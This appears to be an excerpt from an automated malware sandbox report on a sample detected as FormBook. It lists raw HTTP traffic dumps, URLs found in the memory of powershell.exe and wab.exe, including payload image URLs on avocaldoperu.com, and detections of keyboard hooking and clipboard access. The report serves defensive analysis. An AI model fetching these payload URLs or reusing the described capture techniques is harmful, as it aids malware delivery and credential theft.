49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4298e590842f1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C\|F_F .rN}&M/4x{klm
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4299e0a1f429d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85 Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt\|yB?z9?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba429addc408cdd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g\|Y2igo~zN9:d`:THz "?L5%vEst3\ori%\|'_sFdg.!\|35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://avocaldoperu.com
Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enH
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp(
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpX
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpg
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe	String found in binary or memory: http://www.ebuddy.com
Source: wab.exe	String found in binary or memory: http://www.imvu.com
Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: wab.exe	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/
Source: wab.exe, 0000000A.00000002.4221123486.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse1.png
Source: wab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperu.com/Jouse4.png
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avocaldoperuone.com/Jouse4.png
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&f
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: wab.exe, 00000011.00000002.2267325741.0000000003444000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe	String found in binary or memory: https://www.google.com
Source: wab.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.62.202:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

17_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	17_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	17_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	18_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	18_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_004072B5

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
